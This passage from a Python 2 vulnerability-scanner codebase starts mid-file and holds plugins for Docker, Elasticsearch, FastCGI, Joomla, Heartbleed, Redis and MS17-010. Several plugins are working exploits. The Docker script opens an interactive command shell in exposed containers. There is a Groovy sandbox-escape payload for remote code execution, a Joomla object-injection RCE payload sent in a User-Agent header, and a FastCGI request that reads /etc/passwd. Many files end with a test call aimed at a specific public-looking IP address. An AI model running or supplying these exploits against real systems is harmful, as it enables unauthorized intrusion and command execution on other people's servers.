[] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/docker/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['docker', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if port =='2375' : 6 | return True 7 | else: 8 | 9 | return False -------------------------------------------------------------------------------- /component/docker/dockerleak.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | import os 5 | import platform 6 | import subprocess 7 | import signal 8 | import time 9 | import requests,urllib2,json,urlparse 10 | 11 | class TimeoutError(Exception): 12 | pass 13 | def command(cmd, timeout=60): 14 | """Run command and return the output 15 | cmd - the command to run 16 | timeout - max seconds to wait for 17 | """ 18 | is_linux = platform.system() == 'Linux' 19 | 20 | p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None) 21 | if timeout==0: 22 | return p.stdout.read() 23 | t_beginning = 
time.time() 24 | seconds_passed = 0 25 | while True: 26 | if p.poll() is not None: 27 | break 28 | seconds_passed = time.time() - t_beginning 29 | if timeout and seconds_passed > timeout: 30 | if is_linux: 31 | os.killpg(p.pid, signal.SIGTERM) 32 | else: 33 | p.terminate() 34 | raise TimeoutError(cmd, timeout) 35 | time.sleep(0.1) 36 | return p.stdout.read() 37 | class P(T): 38 | def __init__(self): 39 | T.__init__(self) 40 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 41 | 42 | result = {} 43 | result['result']=False 44 | r=None 45 | targeturl='http://'+ip+':2375' 46 | 47 | try: 48 | 49 | usecommand = 'python '+ os.path.split(os.path.realpath(__file__))[0]+'/script/docker_unauth.py -url '+targeturl+' -step check' 50 | msgresult = command(usecommand, timeout=5) 51 | print msgresult 52 | if 'find vulnerable' in msgresult: 53 | result['result']=True 54 | result['VerifyInfo'] = {} 55 | result['VerifyInfo']['type']='docker unauth vul' 56 | result['VerifyInfo']['URL'] =ip+':'+port 57 | result['VerifyInfo']['payload']=usecommand 58 | result['VerifyInfo']['result'] =msgresult 59 | 60 | 61 | except Exception,e: 62 | print e.text 63 | finally: 64 | if r is not None: 65 | r.close() 66 | return result 67 | if __name__ == '__main__': 68 | print P().verify(ip='139.217.25.172', port='2375') 69 | -------------------------------------------------------------------------------- /component/docker/script/docker_unauth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | from urlparse import urlparse, urlunparse, urljoin 4 | import json,socket 5 | import time 6 | import argparse 7 | 8 | notice = u''' 9 | ''' 10 | 11 | class WavsPlugin(): 12 | def choosedocker(self,sock, DocerVulns): 13 | total = len(DocerVulns) 14 | while True: 15 | print "You Can Control: "+str(len(DocerVulns))+" dockers" 16 | for docker in DocerVulns: 17 | print '--'*15 18 | print 
docker 19 | print "Enter 'q' for quit." 20 | dockerid = raw_input("The ID:") 21 | if dockerid == "q": 22 | break 23 | try: 24 | num = int(dockerid) - 1 25 | if num in range(0, total): 26 | print dockerid 27 | Id = DocerVulns[num].split("#")[2] 28 | Command = DocerVulns[num].split("#")[3] 29 | self.getexec(sock, Id, Command) 30 | except Exception, e: 31 | print "something error..try again.." 32 | print "bye bye..." 33 | sock.close() 34 | return 35 | 36 | def getexec(self, sock, Id, Command): 37 | # print "Command: "+Command 38 | # print "Id: "+Id 39 | # Created My Id 40 | # 12 bytes of Id 41 | ContainerId = Id 42 | execDockerPOSTOne = '''\ 43 | POST /v1.20/containers/ContainerId/exec HTTP/1.1 44 | Host: 115.123.123.123:2375 45 | User-Agent: Docker-Client/1.8.0 (windows) 46 | Content-Length: 156 47 | Content-Type: application/json 48 | Accept-Encoding: gzip 49 | {"User":"","Privileged":false,"Tty":true,"Container":"ContainerId","AttachStdin":true,"AttachStderr":true,"AttachStdout":true,"Detach":false,"Cmd":["Command"]} 50 | ''' 51 | execDockerPOSTOne = execDockerPOSTOne.replace('ContainerId', ContainerId).replace('Command', Command) 52 | sock.sendall(execDockerPOSTOne) 53 | createInfo = sock.recv(1024*10) 54 | # print createInfo 55 | strlist = createInfo.split('\n') 56 | CreatedId = json.loads(strlist[6])['Id'] 57 | # print "CreatedId = " + CreatedId 58 | 59 | execDockerTwo = "/v1.20/exec/"+Id+"/resize?h=33&w=80" 60 | execDockerPOSTtwo = '''\ 61 | POST /v1.20/exec/CreatedId/start HTTP/1.1 62 | Host: 115.123.123.79:2375 63 | User-Agent: Docker-Client/1.8.0 (windows) 64 | Content-Length: 163 65 | Connection: Upgrade 66 | Content-Type: text/plain 67 | Upgrade: tcp 68 | {"User":"","Privileged":false,"Tty":true,"Container":"ContainerId","AttachStdin":true,"AttachStderr":true,"AttachStdout":true,"Detach":false,"Cmd":["Command"]} 69 | ''' 70 | execDockerPOSTtwo = execDockerPOSTtwo.replace('ContainerId', ContainerId).replace('Command', Command) 71 | execDockerPOSTtwo = 
execDockerPOSTtwo.replace("CreatedId", CreatedId) 72 | time.sleep(1) 73 | sock.sendall(execDockerPOSTtwo) 74 | startinfo = sock.recv(1024*10) 75 | while True: 76 | print "nter q for quit." 77 | cmd = raw_input("$:") 78 | sock.sendall(cmd+'\x0d') 79 | time.sleep(2) 80 | if "q" == cmd: 81 | return 82 | print sock.recv(1024*10) 83 | 84 | def cmd_run(self, url, step): 85 | print notice 86 | urlinfo = urlparse(url) 87 | baseurl = urlunparse((urlinfo.scheme, urlinfo.netloc, '/', '', '', '')) 88 | print "Checking "+baseurl 89 | host, port = urlinfo.netloc.split(":") 90 | socket.setdefaulttimeout(5) 91 | try: 92 | poc = "containers/json" 93 | psall = "v1.20/containers/json?all=1" 94 | pocget = '''GET '''+baseurl+poc+''' HTTP/1.1\r\nHost: '''+host+":"+port+'''\r\n\r\n''' 95 | psget = '''GET '''+baseurl+psall+''' HTTP/1.1\r\nHost: '''+host+":"+port+'''\r\n\r\n''' 96 | 97 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 98 | server_address = (host, int(port)) 99 | sock.connect(server_address) 100 | if "check" == step: 101 | sock.sendall(pocget) 102 | time.sleep(2) 103 | pocinfo = sock.recv(1024*10) 104 | if "Command" in pocinfo and "Server: Docker" in pocinfo: 105 | print "{url} find vulnerable.".format(url=url) 106 | else: 107 | print "{url} is not vulnerable.".format(url=url) 108 | exit(0) 109 | 110 | sock.sendall(psget) 111 | time.sleep(2) 112 | psinfo = sock.recv(1024*200) 113 | strlist = psinfo.split('\r\n') 114 | dockerpsstr = strlist[7] 115 | 116 | decoded = json.loads(dockerpsstr) 117 | 118 | DocerVulns = [] 119 | count = 1 120 | Command = "" 121 | Id = "" 122 | accessCommand = ['sh', '/bin/sh', '/bin/bash', 'bash', '/bin/csh', 'csh', 123 | '/bin/ksh', 'ksh', '/bin/tcsh', 'tcsh', '/bin/zsh', 'zsh'] 124 | for i in decoded: 125 | if ("Up" in i['Status']) and ("Exited" not in i['Status']) and (i['Command'] in accessCommand): 126 | Command = i['Command'] 127 | Id = i['Id'] 128 | ImageName = i['Image'] 129 | dockervuln = "ID:"+str(count)+". 
#System:"+ImageName+" #"+Id[0:12]+"#"+Command 130 | DocerVulns.append(dockervuln) 131 | count = count + 1 132 | 133 | if len(DocerVulns) == 0: 134 | print "nothing can be used!" 135 | sock.close() 136 | return 137 | else: 138 | self.choosedocker(sock, DocerVulns) 139 | sock.close() 140 | except Exception, e: 141 | print "Failed to connection target" 142 | exit(0) 143 | sock.close() 144 | 145 | if __name__ == '__main__': 146 | parser = argparse.ArgumentParser() 147 | parser.add_argument('-url', help='the target url.') 148 | parser.add_argument('-step', help='check|getshell') 149 | args = parser.parse_args() 150 | args_dict = args.__dict__ 151 | plg = WavsPlugin() 152 | 153 | try: 154 | if not (args_dict['url'] == None): 155 | url = args_dict['url'] 156 | if not (args_dict['step'] == None): 157 | step = args_dict['step'] 158 | 159 | plg.cmd_run(url,step) 160 | else: 161 | print parser.print_usage() 162 | exit(0) 163 | except Exception,e: 164 | print parser.print_usage() 165 | exit(-1) -------------------------------------------------------------------------------- /component/docker/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | 
result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/elasticsearch/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['elasticsearch', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | return False -------------------------------------------------------------------------------- /component/elasticsearch/elasticsearch_groovy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | import requests,urllib2,json,urlparse 5 | class P(T): 6 | def __init__(self): 7 | T.__init__(self) 8 | vulID = '1708' # vul ID 9 | version = '1' 10 | 11 | vulDate = '2015-03-04' 12 | createDate = '2015-03-04' 13 | updateDate = '2015-03-04' 14 | references = ['http://bobao.360.cn/learning/detail/275.html'] 15 | name = 'elasticsearch v1.43 _search 命令执行漏洞 POC' 16 | appPowerLink = 'http://www.elasticsearch.org' 17 | appName = 'elasticsearch' 18 | appVersion = 'v1.43' 19 | vulType = 'Command Execution' 20 | desc = ''' 21 | 脚本查询模块,由于搜索引擎支持使用脚本代码作为表达式进行数据操作,攻击 22 | 者可以通过MVEL构造执行任意java代码,后来脚本语言引擎换成了Groovy,并且 23 | 加入了沙盒进行控制,由于沙盒限制的不严格,导致远程代码执行 24 | ''' 25 | def CVE20151427(self,url): 26 | req=None 27 | content=None 28 | try: 29 | target_url = "http://"+url+":9200/_search" 30 | payload = '{"size": 1,"script_fields": {"secpulse": {"script":' \ 31 | ' "java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"COMMAND\\\")","lang": "groovy"}}}' 32 | req = urllib2.urlopen(target_url,data=payload,timeout=2) 33 | content = req.read() 34 | except Exception,e: 35 | content = e 36 | finally: 37 | 38 | if req: 39 | req.close() 40 | del req 41 | return content 42 | 43 | def 
verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 44 | 45 | result = {} 46 | content_2 = self.CVE20151427(ip) 47 | 48 | result['result']=False 49 | if 'Cannot run program \\\\\\\"COMMAND\\\\\\\"' in content_2: 50 | 51 | result['result']=True 52 | result['VerifyInfo'] = {} 53 | result['VerifyInfo']['type']='Command Execution' 54 | result['VerifyInfo']['URL'] =ip+":9200/_search" 55 | result['VerifyInfo']['payload'] = '{"size": 1,"script_fields": {"secpulse": {"script":' \ 56 | ' "java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"COMMAND\\\")","lang": "groovy"}}}' 57 | 58 | return result 59 | if __name__ == '__main__': 60 | 61 | print P().verify(ip='42.120.7.130',port='9200') 62 | 63 | -------------------------------------------------------------------------------- /component/elasticsearch/elasticsearch_nodestate.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | 5 | import requests,urllib2,json,urlparse 6 | class P(T): 7 | def __init__(self): 8 | T.__init__(self) 9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 10 | target_url = "http://"+ip+":9200/_nodes/stats" 11 | result = {} 12 | result['result']=False 13 | r=None 14 | try: 15 | r=requests.get(url=target_url,timeout=2) 16 | if r.status_code==200: 17 | result['result']=True 18 | result['VerifyInfo'] = {} 19 | result['VerifyInfo']['type']='information unclosed' 20 | result['VerifyInfo']['URL'] =ip+":9200/_nodes/stats" 21 | result['VerifyInfo']['payload']='IP:9200/_nodes/stats' 22 | result['VerifyInfo']['result'] =r.text 23 | else: 24 | pass 25 | except Exception,e: 26 | print e.text 27 | finally: 28 | if r is not None: 29 | r.close() 30 | del r 31 | return result 32 | if __name__ == '__main__': 33 | print P().verify(ip='42.120.7.120',port='9200') 34 | 
-------------------------------------------------------------------------------- /component/elasticsearch/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/fast_cgi/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['fast-cgi', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | if port=='9000': 4 | return True 5 | else: 6 | return False -------------------------------------------------------------------------------- /component/fast_cgi/fast_cgi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | 5 | import socket 6 | 7 | 8 | class P(T): 9 | def __init__(self): 10 | T.__init__(self) 11 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 12 | timeout=3 13 | 14 | 15 | 16 | 
result = {} 17 | result['result']=False 18 | 19 | 20 | target_url='http://'+ip+':'+port 21 | socket.setdefaulttimeout(timeout) 22 | client_socket=None 23 | # 测试是否有leak 24 | try: 25 | client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | client_socket.connect((ip, 9000)) 27 | data = """ 28 | 01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00 29 | 01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 30 | 54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 31 | 56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 32 | 2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 33 | 4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44 34 | 52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 35 | 50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 36 | 70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53 37 | 4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69 38 | 63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00 39 | """ 40 | data_s = '' 41 | for _ in data.split(): 42 | data_s += chr(int(_, 16)) 43 | client_socket.send(data_s) 44 | ret = client_socket.recv(1024) 45 | 46 | if ret.find(':root:') > 0: 47 | result['result']=True 48 | result['VerifyInfo'] = {} 49 | result['VerifyInfo']['type']='fast-cgi Vulnerability' 50 | result['VerifyInfo']['URL'] =target_url 51 | result['VerifyInfo']['payload']=data_s 52 | result['VerifyInfo']['result'] =ret 53 | 54 | 55 | except: 56 | pass 57 | 58 | finally: 59 | if client_socket is not None: 60 | client_socket.close() 61 | 62 | return result 63 | 64 | 65 | 66 | 67 | 68 | 69 | if __name__ == '__main__': 70 | print P().verify(ip='58.220.22.101',port='80') -------------------------------------------------------------------------------- /component/fast_cgi/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def 
match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/joomla/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['joomla', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if 'joomla' in context or 'joomla' in hackinfo: 6 | return True 7 | else: 8 | 9 | return False -------------------------------------------------------------------------------- /component/joomla/joomla_unrec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | import urllib2 5 | import cookielib 6 | 7 | 8 | import pexpect 9 | 10 | class P(T): 11 | def __init__(self): 12 | T.__init__(self) 13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 14 | 15 | result = {} 16 | result['result']=False 17 | target_url = "http://"+ip+":"+port 18 | 19 | i=0 20 | req=None 21 | try: 22 | 23 | cj = cookielib.CookieJar() 24 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) 25 | urllib2.install_opener(opener) 26 | urllib2.socket.setdefaulttimeout(10) 27 | 28 | ua = 
'}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86' 29 | 30 | req = urllib2.Request(url=target_url, headers={'User-Agent': ua}) 31 | opener.open(req) 32 | req = urllib2.Request(url=target_url) 33 | if 'SERVER["REMOTE_ADDR"]' in opener.open(req).read(): 34 | 35 | 36 | result['result'] = True 37 | result['VerifyInfo'] = {} 38 | result['VerifyInfo']['type'] = 'joomla unrec' 39 | result['VerifyInfo']['URL'] = ip + ':' + port 40 | result['VerifyInfo']['payload'] = ua 41 | 42 | 43 | except Exception,e: 44 | pass 45 | 46 | finally: 47 | if req is not None: 48 | del req 49 | return result 50 | if __name__ == '__main__': 51 | print P().verify(ip='119.90.40.147',port='8081') 52 | -------------------------------------------------------------------------------- /component/joomla/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def 
attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/openssl/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['heartblede', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if int(port) in [443,587,465,995,8443] or productname.get('protocol','') in ['https','smtp','pop','imap','https-alt']: 6 | return True 7 | else: 8 | 9 | return False -------------------------------------------------------------------------------- /component/openssl/heartbleed.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | import os 5 | import platform 6 | import subprocess 7 | import signal 8 | import time 9 | import requests,urllib2,json,urlparse 10 | 11 | class TimeoutError(Exception): 12 | pass 13 | def command(cmd, timeout=60): 14 | """Run command and return the output 15 | cmd - the command to run 16 | timeout - max seconds to wait for 17 | """ 18 | is_linux = platform.system() == 'Linux' 19 | 20 | p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None) 21 | if timeout==0: 22 | return p.stdout.read() 23 | t_beginning = time.time() 24 | seconds_passed = 0 25 | while True: 26 | if p.poll() is not None: 27 | break 28 | seconds_passed = time.time() - t_beginning 29 | if timeout and seconds_passed > timeout: 30 | if is_linux: 31 | os.killpg(p.pid, signal.SIGTERM) 32 | else: 33 | p.terminate() 34 | raise TimeoutError(cmd, timeout) 35 | time.sleep(0.1) 36 | return p.stdout.read() 37 | class P(T): 38 | def 
__init__(self): 39 | T.__init__(self) 40 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 41 | 42 | result = {} 43 | result['result']=False 44 | r=None 45 | 46 | usecommand='python '+os.path.split(os.path.realpath(__file__))[0]+'/script/heartbleedpoc.py '+ip+' -p '+port 47 | try: 48 | msgresult = command(usecommand, timeout=3) 49 | print msgresult 50 | if 'find vulnerability' in msgresult: 51 | result['result']=True 52 | result['VerifyInfo'] = {} 53 | result['VerifyInfo']['type']='heartbleed vul' 54 | result['VerifyInfo']['URL'] =ip+':'+port 55 | result['VerifyInfo']['payload']='heartbleedpoc' 56 | result['VerifyInfo']['result'] =msgresult 57 | else: 58 | pass 59 | except Exception,e: 60 | print e.text 61 | finally: 62 | if r is not None: 63 | r.close() 64 | return result 65 | if __name__ == '__main__': 66 | print P().verify(ip='58.213.14.178',port='443') 67 | -------------------------------------------------------------------------------- /component/openssl/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 
| result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/redis/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['redis', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if int(port) in [6379] or productname.get('protocol','') in ['redis']: 6 | return True 7 | else: 8 | 9 | return False -------------------------------------------------------------------------------- /component/redis/redis_unauth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | 5 | import socket 6 | 7 | 8 | 9 | 10 | class P(T): 11 | def __init__(self): 12 | T.__init__(self) 13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 14 | 15 | result = {} 16 | result['result']=False 17 | s=None 18 | 19 | 20 | try: 21 | 22 | payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a' 23 | s = socket.socket() 24 | socket.setdefaulttimeout(10) 25 | 26 | 27 | s.connect((ip, int(port))) 28 | s.send(payload) 29 | recvdata = s.recv(1024) 30 | if recvdata and 'redis_version' in recvdata: 31 | result['result'] = True 32 | result['VerifyInfo'] = {} 33 | result['VerifyInfo']['type'] = 'redis unauth access vul' 34 | result['VerifyInfo']['URL'] = ip 35 | result['VerifyInfo']['Port'] = port 36 | 37 | result['VerifyInfo']['result'] = recvdata 38 | 39 | 40 | except Exception,e: 41 | print e.text 42 | finally: 43 | if s is not None: 44 | s.close() 45 | return result 46 | if __name__ == '__main__': 47 | # print P().verify(ip='61.146.115.83',port='81') 48 | print P().verify(ip='121.41.28.130', port='7002') 49 | -------------------------------------------------------------------------------- /component/redis/t.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /component/smb/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['smb', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if int(port) in [445] : 6 | return True 7 | else: 8 | 9 | return False -------------------------------------------------------------------------------- /component/smb/ms17_010.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | #author:wolf@YSRC 4 | #url:http://bobao.360.cn/learning/detail/3738.html 5 | from t import T 6 | import socket 7 | import binascii 8 | 9 | 10 | 11 | class P(T): 12 | def __init__(self): 13 | T.__init__(self) 14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 15 | 16 | result = {} 17 | 
result['result']=False 18 | 19 | 20 | try: 21 | 22 | label=self.check(ip,port,timeout=3000) 23 | if label: 24 | result['result'] = True 25 | result['VerifyInfo'] = {} 26 | result['VerifyInfo']['type'] = 'remote command execute' 27 | result['VerifyInfo']['URL'] = ip 28 | result['VerifyInfo']['Port'] = port 29 | 30 | result['VerifyInfo']['result'] = "NSA Eternalblue SMB,SMB远程溢出" 31 | 32 | 33 | except Exception,e: 34 | print e.text 35 | finally: 36 | 37 | return result 38 | 39 | def get_tree_connect_request(self,ip, tree_id): 40 | ipc = "005c5c" + binascii.hexlify(ip) + "5c49504324003f3f3f3f3f00" 41 | ipc_len_hex = hex(len(ipc) / 2).replace("0x", "") 42 | smb = "ff534d4275000000001801280000000000000000000000000000729c" + binascii.hexlify( 43 | tree_id) + "c4e104ff00000000000100" + ipc_len_hex + "00" + ipc 44 | tree = "000000" + hex(len(smb) / 2).replace("0x", "") + smb 45 | tree_connect_request = binascii.unhexlify(tree) 46 | return tree_connect_request 47 | 48 | def check(self,ip, port, timeout): 49 | negotiate_protocol_request = binascii.unhexlify( 50 | "00000054ff534d4272000000001801280000000000000000000000000000729c0000c4e1003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200") 51 | session_setup_request = binascii.unhexlify( 52 | "0000008fff534d4273000000001801280000000000000000000000000000729c0000c4e10cff000000dfff0200010000000000310000000000d400008054004e544c4d5353500001000000050208a2010001002000000010001000210000002e3431426c7441314e505974624955473057696e646f7773203230303020323139350057696e646f7773203230303020352e3000") 53 | try: 54 | s=None 55 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 56 | s.settimeout(timeout) 57 | s.connect((ip, port)) 58 | s.send(negotiate_protocol_request) 59 | s.recv(1024) 60 | s.send(session_setup_request) 